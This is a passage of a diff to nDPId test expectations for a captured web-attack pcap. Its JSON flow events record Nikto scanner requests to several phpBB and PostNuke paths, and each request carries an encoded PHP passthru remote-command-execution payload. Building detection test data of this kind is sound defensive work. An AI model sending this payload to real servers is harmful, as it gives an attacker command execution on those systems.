 00840{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"ts_msec":1576420277782,"pkt":"AAAAAAAAAAAAAAAACABFAAFGytRAAEAGcNt\/AAABfwAAAcbeH5B57PP4Y5pS64AYAED\/OgAAAQEICp1m\/z6dZv8+R0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00995{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
+01184{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"ts_msec":1576420277784,"pkt":"AAAAAAAAAAAAAAAACABFAAFPyZ9AAEAGcgd\/AAABfwAAAcbgH5CxOPC81O+RlYAYAED\/QwAAAQEICp1m\/0CdZv8\/R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
+01194{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00858{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"ts_msec":1576420277785,"pkt":"AAAAAAAAAAAAAAAACABFAAFUq9tAAEAGj8Z\/AAABfwAAAcbiH5CAV5MAtOr6\/IAYAED\/SAAAAQEICp1m\/0GdZv9BR0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01011{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
+01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"ts_msec":1576420277786,"pkt":"AAAAAAAAAAAAAAAACABFAAFOulhAAEAGgU9\/AAABfwAAAcbkH5AY64NxSFA9PIAYAED\/QgAAAQEICp1m\/0KdZv9CR0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01004{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
+01193{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"ts_msec":1576420277788,"pkt":"AAAAAAAAAAAAAAAACABFAAFMGchAAEAGIeJ\/AAABfwAAAcbmH5Ae1yDiPfgPVIAYAED\/QAAAAQEICp1m\/0OdZv9DR0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQoNCg=="}
-01002{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
+01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"ts_msec":1576420277790,"pkt":"AAAAAAAAAAAAAAAACABFAAFMIAVAAEAGG6V\/AAABfwAAAcboH5Bd5RklMuM7\/YAYAED\/QAAAAQEICp1m\/0adZv9GR0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01002{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
+01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"ts_msec":1576420277792,"pkt":"AAAAAAAAAAAAAAAACABFAAFfB5NAAEAGNAR\/AAABfwAAAcbqH5CefT66jrIPCIAYAED\/UwAAAQEICp1m\/0idZv9HR0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-01020{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}}
+01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 